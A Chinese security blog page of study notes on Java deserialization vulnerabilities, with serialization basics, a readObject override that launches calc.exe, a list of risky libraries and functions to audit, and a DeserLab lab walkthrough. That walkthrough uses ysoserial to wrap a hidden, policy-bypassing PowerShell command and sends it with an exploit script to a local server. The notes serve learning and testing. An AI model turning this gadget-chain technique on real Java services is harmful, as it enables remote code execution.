<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>Java 反序列化 | Sec-note</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Java 反序列化学习记录笔记，持续学习研究。">
<meta property="og:type" content="article">
<meta property="og:title" content="Java 反序列化">
<meta property="og:url" content="http://yoursite.com/2018/04/08/java_发序列化/index.html">
<meta property="og:site_name" content="Sec-note">
<meta property="og:description" content="Java 反序列化学习记录笔记，持续学习研究。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-3/97255792.jpg">
<meta property="og:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/15517531.jpg">
<meta property="og:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/79586731.jpg">
<meta property="og:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/97971690.jpg">
<meta property="og:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/52073188.jpg">
<meta property="og:updated_time" content="2018-12-11T11:32:54.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Java 反序列化">
<meta name="twitter:description" content="Java 反序列化学习记录笔记，持续学习研究。">
<meta name="twitter:image" content="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-3/97255792.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Sec-note" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Sec-note</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-java_发序列化" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/04/08/java_发序列化/" class="article-date">
  <time datetime="2018-04-08T10:13:23.000Z" itemprop="datePublished">2018-04-08</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/安全研究/">安全研究</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Java 反序列化
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><code>Java</code> 反序列化学习记录笔记，持续学习研究。</p>
<a id="more"></a>
<h3 id="Java反序列化漏洞从入门到深入"><a href="#Java反序列化漏洞从入门到深入" class="headerlink" title="Java反序列化漏洞从入门到深入"></a><a href="https://xz.aliyun.com/t/2041" target="_blank" rel="noopener">Java反序列化漏洞从入门到深入</a></h3><p> Java反序列化</p>
<p>学习以下技术文章，研究一下反序列化漏洞。</p>
<p>按照一些技术文章学习反序列化漏洞。</p>
<h4 id="Java对象序列化"><a href="#Java对象序列化" class="headerlink" title="Java对象序列化"></a>Java对象序列化</h4><p>序列化是一种对象持久化的手段。</p>
<p>使用Java对象序列化，在保存对象时，会把其状态保存为一组字节。在反序列化时，再将这些字节组装成对象。对象序列化保存的是对象的“状态”，即它的成员变量。</p>
<h4 id="序列化过程和反序列化过程"><a href="#序列化过程和反序列化过程" class="headerlink" title="序列化过程和反序列化过程"></a>序列化过程和反序列化过程</h4><p><a href="http://www.cnblogs.com/canvas512732559/p/xuliehua.html" target="_blank" rel="noopener">Java序列化和反序列化</a></p>
<p>java.io包有两个序列化对象的类。ObjectOutputStream负责将对象写入字节流，ObjectInputStream从字节流重构对象。</p>
<p>在Java中，只要一个类实现了java.io.Serializable接口，那么它就可以被序列化。</p>
<p><a href="http://www.hollischuang.com/archives/1140" target="_blank" rel="noopener">深入分析Java的序列化与反序列化</a></p>
<p><a href="http://www.runoob.com/java/java-serialization.html" target="_blank" rel="noopener">Java 序列化</a></p>
<p><a href="http://www.cnblogs.com/xdp-gacl/p/3777987.html" target="_blank" rel="noopener">Java对象的序列化和反序列化</a></p>
<blockquote>
<p>java.io.ObjectOutputStream代表对象输出流，它的writeObject(Object obj)方法可对参数指定的obj对象进行序列化，把得到的字节序列写到一个目标输出流中。</p>
</blockquote>
<blockquote>
<p>java.io.ObjectInputStream代表对象输入流，它的readObject()方法从一个源输入流中读取字节序列，再把它们反序列化为一个对象，并将其返回。</p>
</blockquote>
<p>对象序列化包括如下步骤：</p>
<p>　　1） 创建一个对象输出流，它可以包装一个其他类型的目标输出流，如文件输出<br>流；</p>
<p>　　2） 通过对象输出流的writeObject()方法写对象。</p>
<p>对象反序列化的步骤如下：</p>
<p>　　1） 创建一个对象输入流，它可以包装一个其他类型的源输入流，如文件输入流；</p>
<p>　　2） 通过对象输入流的readObject()方法读取对象。</p>
<p>参考上面的文章，进行序列化和反序列化的学习。</p>
<p>一个<code>Person</code>类</p>
<pre><code>package com_sre;
import java.io.Serializable;
public class Person implements Serializable{

    /**
     * 序列化ID
     */
    private static final long serialVersionUID = -7770379408769870725L;
    private int age;
    private String name;
    private String sex;
    public int getAge() {
        return age;
    }
    public void setAge(int age) {
        this.age = age;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public String getSex() {
        return sex;
    }
    public void setSex(String sex) {
        this.sex = sex;
    }

}
</code></pre><p>对其进行序列化和反序列化。</p>
<pre><code>package com_sre;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.text.MessageFormat;
public class sre_person {
    public static void main(String[] args) throws Exception {
        SerializePerson();   //序列化Person对象
        Person p = DeserializePerson();  //反序列化对象
        System.out.println(MessageFormat.format(&quot;name={0},age={1},sex={2}&quot;,p.getName(),p.getAge(),p.getSex()));        
    }

    private static void SerializePerson() throws FileNotFoundException,IOException {

        Person person = new Person(); //实例化
        person.setName(&quot;sec-note&quot;);
        person.setAge(26);
        person.setSex(&quot;男&quot;);
        // ObjectOutputStream 对象输出流，将Person对象存储到E盘的Person.txt文件中，完成对Person对象的序列化操作
        //ObjectOutputStream 输出流，其方法对 writeObject方法写对象
        ObjectOutputStream oo = new ObjectOutputStream(new FileOutputStream(
                   new File(&quot;E:/Person.txt&quot;)));
        oo.writeObject(person);
        System.out.println(&quot;Person对象序列化成功&quot;);
    }

    //反序列化
    private static Person DeserializePerson() throws Exception,IOException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(
                new File(&quot;E:/Person.txt&quot;)));
        Person person = (Person) ois.readObject(); //readObject()方法读取对象
        System.out.println(&quot;Person对象反序列化成功&quot;);
        return person;
    }



}
</code></pre><p>结果</p>
<pre><code>Person对象序列化成功
Person对象反序列化成功
name=sec-note,age=26,sex=男
</code></pre><p>序列化的文件<code>Person.txt</code></p>
<pre><code> sr com_sre.Person?褻{ I ageL namet Ljava/lang/String;L sexq ~ xp   t sec-notet 鐢?
</code></pre><h4 id="简单的反序列化-demon"><a href="#简单的反序列化-demon" class="headerlink" title="简单的反序列化 demon"></a>简单的反序列化 demon</h4><p>反序列化中，还会调用被反序列化的<code>readObject</code>方法，这个方法是默认的，当重写时，可以引发漏洞。</p>
<p>在上面的<code>Person</code>类中，重写<code>readObject</code>。重写readObject方法，加入了弹计算器的执行代码的内容</p>
<pre><code>private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
            //执行默认的readObject()方法
            in.defaultReadObject();
            //执行命令
            Runtime.getRuntime().exec(&quot;calc.exe&quot;);
        }
</code></pre><p><img src="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-3/97255792.jpg" alt></p>
<p>在<code>Person</code>类中重写了<code>readObject</code>方法，然后反序列化的时候，调用该方法，执行了相应的<code>payload</code>。</p>
<p>反序列化，其中的内置方法被重写。</p>
<h4 id="反序列化漏洞源头"><a href="#反序列化漏洞源头" class="headerlink" title="反序列化漏洞源头"></a>反序列化漏洞源头</h4><p><strong>开发失误</strong></p>
<p>黑名单被绕过。</p>
<p><strong>基础库中隐藏的反序列化漏洞</strong></p>
<blockquote>
<p>2015年由黑客Gabriel Lawrence和Chris Frohoff发现的<font color="red">‘Apache Commons Collections’</font>类库直接影响了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等大型框架。</p>
</blockquote>
<p>存在危险的基本库。</p>
<pre><code>commons-fileupload 1.3.1
commons-io 2.4
commons-collections 3.1
commons-logging 1.2
commons-beanutils 1.9.2
org.slf4j:slf4j-api 1.7.21
com.mchange:mchange-commons-java 0.2.11
org.apache.commons:commons-collections 4.0
com.mchange:c3p0 0.9.5.2
org.beanshell:bsh 2.0b5
org.codehaus.groovy:groovy 2.3.9
org.springframework:spring-aop 4.1.4.RELEASE
</code></pre><p>引入用户可控的序列化数据，并使用不安全的基本库，就意味着存在反序列化漏洞。</p>
<h4 id="如何发现Java反序列化漏洞"><a href="#如何发现Java反序列化漏洞" class="headerlink" title="如何发现Java反序列化漏洞"></a>如何发现Java反序列化漏洞</h4><h5 id="白盒审计"><a href="#白盒审计" class="headerlink" title="白盒审计"></a>白盒审计</h5><p>反序列化操作存在的地方。导入模板文件、网络通信、数据传输、日志格式化存储、对象数据落磁盘、或DB存储等业务场景。</p>
<p>通过检索源码中对反序列化函数的调用来静态寻找反序列化的输入点。</p>
<p>搜索以下函数。</p>
<pre><code>ObjectInputStream.readObject
ObjectInputStream.readUnshared
XMLDecoder.readObject
Yaml.load
XStream.fromXML
ObjectMapper.readValue
JSON.parseObject
</code></pre><p>小数点前面是类名，后面是方法名。</p>
<h5 id="黑盒测试"><a href="#黑盒测试" class="headerlink" title="黑盒测试"></a>黑盒测试</h5><p>可以通过分析十六进制数据块，锁定某些存在漏洞的通用基础库（比如Apache Commons Collection）的调用地点，并进行数据替换，从而实现利用。</p>
<h4 id="环境测试"><a href="#环境测试" class="headerlink" title="环境测试"></a>环境测试</h4><h5 id="DeserLab演示"><a href="#DeserLab演示" class="headerlink" title="DeserLab演示"></a><a href="https://github.com/NickstaDB/DeserLab" target="_blank" rel="noopener">DeserLab演示</a></h5><p><a href="https://github.com/NickstaDB/DeserLab" target="_blank" rel="noopener">DeserLab演示</a>是一个使用了<code>Groovy</code>库的简单网络协议应用，实现<code>client</code>和<code>server</code>端发送序列化数据的功能，该库和<code>Apache Commons Collection</code>库一样，含有可利用的POP链。</p>
<p><a href="http://jackson.thuraisamy.me/runtime-exec-payloads.html" target="_blank" rel="noopener">生成有效载荷</a></p>
<p><img src="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/15517531.jpg" alt></p>
<p>用ysoserial生成针对Groovy库的payload</p>
<pre><code>E:\Download&gt;java -jar ysoserial-master.jar  Groovy1 &quot;powershell.exe -NonI -W Hid
den -NoP -Exec Bypass -Enc bQBrAGQAaQByACAAcwBlAGMAXwBuAG8AdABlAA==&quot; &gt; payload2.
bin
</code></pre><p>在DeserLab的Github项目页面下载DeserLab.jar<br>命令行下使用<code>java -jar DeserLab.jar -server 127.0.0.1 6666</code>开启本地服务端。</p>
<p><img src="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/79586731.jpg" alt></p>
<p>使用<a href="https://gist.github.com/DiabloHorn/8630948d953386d2ed575e17f8635ee7" target="_blank" rel="noopener">deserlab_exploit.py</a>脚本执行<code>payload</code>。</p>
<pre><code>python deserlab_exploit.py 127.0.0.1 6666 payload2.bin
</code></pre><p><img src="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/97971690.jpg" alt></p>
<p>成功写入一个新文件，命令执行。</p>
<p><img src="https://image-1258195556.cos.ap-shanghai.myqcloud.com/qiniu/18-4-8/52073188.jpg" alt></p>
<h3 id="深入理解-JAVA-反序列化漏洞"><a href="#深入理解-JAVA-反序列化漏洞" class="headerlink" title="深入理解 JAVA 反序列化漏洞"></a><a href="https://paper.seebug.org/312/" target="_blank" rel="noopener">深入理解 JAVA 反序列化漏洞</a></h3><h4 id="反序列化和序列化的使用场景"><a href="#反序列化和序列化的使用场景" class="headerlink" title="反序列化和序列化的使用场景"></a>反序列化和序列化的使用场景</h4><p>有效的实现多平台之间的通信、对象持久化存储。</p>
<blockquote>
<p>HTTP：多平台之间的通信，管理等</p>
</blockquote>
<blockquote>
<p>RMI：是 Java 的一组拥护开发分布式应用程序的 API，实现了不同操作系统之间程序的方法调用。值得注意的是，RMI 的传输 100% 基于反序列化，Java RMI 的默认端口是 1099 端口。</p>
</blockquote>
<blockquote>
<p>JMX：JMX 是一套标准的代理和服务，用户可以在任何 Java 应用程序中使用这些代理和服务实现管理,中间件软件 WebLogic 的管理页面就是基于 JMX 开发的，而 JBoss 则整个系统都基于 JMX 构架。 </p>
</blockquote>
<h4 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h4><p>暴露或者间接暴露反序列化API，导致用户可以操作传入数据，攻击者可以精心构造反序列化对象并执行恶意代码。</p>
<p>​</p>
<h4 id="文章集锦"><a href="#文章集锦" class="headerlink" title="文章集锦"></a>文章集锦</h4><p><a href="https://www.cnblogs.com/alert123/p/5124637.html" target="_blank" rel="noopener">Java反序列化漏洞研究</a></p>
<p><a href="http://www.polaris-lab.com/index.php/archives/447/" target="_blank" rel="noopener">Java反序列化漏洞学习实践一：从Serializbale接口开始，先弹个计算器</a></p>
<p><a href="https://github.com/Cryin/Paper/blob/master/%E6%B5%85%E8%B0%88Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88.md" target="_blank" rel="noopener">浅谈Java反序列化漏洞修复方案.md</a></p>
<p><a href="http://drops.xmd5.com/static/drops/papers-14317.html" target="_blank" rel="noopener">java反序列化工具ysoserial分析</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/04/08/java_发序列化/" data-id="cm8s89868004wtzitdkrqwrp5" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/04/09/CVE-2018-1270/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          CVE-2018-1270 - Spring messaging Spel 代码执行漏洞
        
      </div>
    </a>
  
  
    <a href="/2018/03/30/Jboss/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Jboss 漏洞学习</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/WAF/">WAF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web安全/">Web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web安全资料汇集/">Web安全资料汇集</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web开发/">Web开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/bug-bounty/">bug_bounty</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/life/">life</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/代码审计/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/安全合规/">安全合规</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/安全研究/">安全研究</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/技术研究/">技术研究</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/数据安全/">数据安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/机器学习/">机器学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/渗透技巧/">渗透技巧</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/算法与数据结构/">算法与数据结构</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/编程学习/">编程学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/网络安全/">网络安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/翻译/">翻译</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/计算机基础/">计算机基础</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/零信任/">零信任</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Bypasswaf/">Bypasswaf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CSS/">CSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Django/">Django</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Flask/">Flask</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTML/">HTML</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTP/">HTTP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Javascript/">Javascript</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Jboss/">Jboss</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQLi/">SQLi</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Spring/">Spring</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Struts/">Struts</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tomcat/">Tomcat</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Weblogic/">Weblogic</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/bug-bounty/">bug_bounty</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/git/">git</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/">hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/iis-shortname/">iis-shortname</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/">java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/life/">life</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ssh-log/">ssh-log</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/业务逻辑安全/">业务逻辑安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/安全合规/">安全合规</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/数据安全/">数据安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/翻译/">翻译</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Bypasswaf/" style="font-size: 17.5px;">Bypasswaf</a> <a href="/tags/CSS/" style="font-size: 10px;">CSS</a> <a href="/tags/Django/" style="font-size: 12.5px;">Django</a> <a href="/tags/Flask/" style="font-size: 15px;">Flask</a> <a href="/tags/HTML/" style="font-size: 10px;">HTML</a> <a href="/tags/HTTP/" style="font-size: 10px;">HTTP</a> <a href="/tags/Javascript/" style="font-size: 10px;">Javascript</a> <a href="/tags/Jboss/" style="font-size: 10px;">Jboss</a> <a href="/tags/PHP/" style="font-size: 17.5px;">PHP</a> <a href="/tags/SQLi/" style="font-size: 20px;">SQLi</a> <a href="/tags/Spring/" style="font-size: 10px;">Spring</a> <a href="/tags/Struts/" style="font-size: 12.5px;">Struts</a> <a href="/tags/Tomcat/" style="font-size: 12.5px;">Tomcat</a> <a href="/tags/Weblogic/" style="font-size: 12.5px;">Weblogic</a> <a href="/tags/XSS/" style="font-size: 12.5px;">XSS</a> <a href="/tags/bug-bounty/" style="font-size: 15px;">bug_bounty</a> <a href="/tags/git/" style="font-size: 10px;">git</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/iis-shortname/" style="font-size: 10px;">iis-shortname</a> <a href="/tags/java/" style="font-size: 10px;">java</a> <a href="/tags/life/" style="font-size: 10px;">life</a> <a href="/tags/python/" style="font-size: 15px;">python</a> <a href="/tags/ssh-log/" style="font-size: 10px;">ssh-log</a> <a href="/tags/业务逻辑安全/" style="font-size: 10px;">业务逻辑安全</a> <a href="/tags/安全合规/" style="font-size: 10px;">安全合规</a> <a href="/tags/数据安全/" style="font-size: 10px;">数据安全</a> <a href="/tags/翻译/" style="font-size: 17.5px;">翻译</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/05/">May 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/09/">September 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/06/">June 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/04/">April 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/01/">January 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">December 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/11/">November 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">October 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/09/">September 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/08/">August 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">July 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">May 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/04/">April 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/03/">March 2017</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/05/27/网络安全人才发展报告解读/">网络安全人才发展报告解读</a>
          </li>
        
          <li>
            <a href="/2022/05/27/数据安全法释义/">数据安全释义</a>
          </li>
        
          <li>
            <a href="/2022/04/20/零信任网络 在不可信网络中构建安全系统/">零信任网络 在不可信网络中构建安全系统_读书笔记</a>
          </li>
        
          <li>
            <a href="/2022/03/27/数据治理和数据安全_总概括/">数据治理与数据安全_读书笔记</a>
          </li>
        
          <li>
            <a href="/2022/03/14/Data_security_Security_architecture/">数据安全第一部分 安全架构</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2025 Sec-note<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>